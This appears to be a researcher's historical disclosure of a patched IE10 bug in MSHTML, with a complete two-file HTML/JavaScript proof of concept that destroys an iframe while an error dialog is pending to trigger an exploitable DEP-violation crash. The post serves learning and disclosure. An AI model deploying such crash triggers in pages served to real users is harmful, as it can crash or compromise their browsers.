I found that if window.open("javascript:1", "_self") was called inside an iframe while an error notification dialog was pending — and the parent simultaneously destroyed that iframe — IE10 crashed with a DEP violation rated EXPLOITABLE. The “Display a notification about every script error” option (enabled by default) was required because the error dialog path was what triggered the vulnerable code in MSHTML!CActiveScriptHolder::OnScriptError.
<!-- index.html (attacker page) -->
<iframe src="iframe.html" sandbox="allow-scripts" scrolling="no" width="680" height="100"></iframe>
<script>
window.onmessage = function()
{
document.body.innerHTML = 1;
}
</script><!-- iframe.html -->
<textarea onclick="eval(this.value);" style="width:620px;height:80px;">// CLICK HERE TO RUN THE POC AND CRASH THE BROWSER
parent.postMessage("","*"); // innerHTML that destroys the iFrame.
alert("Close this and then close the ACCESS_DENIED error dialog");
window.open("javascript:1", "_self");
</textarea>The iframe posted a message to destroy itself, then blocked the script with alert. While the alert was open, the parent replaced document.body.innerHTML, destroying the iframe. When the user closed the alert, window.open("javascript:1", "_self") threw an access denied error, routing through OnScriptError — but the trident was already gone. The fault landed at address 0x000c0000, rated EXPLOITABLE as a software NX / DEP violation in MSHTML!CActiveScriptHolder::OnScriptError+0x175.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.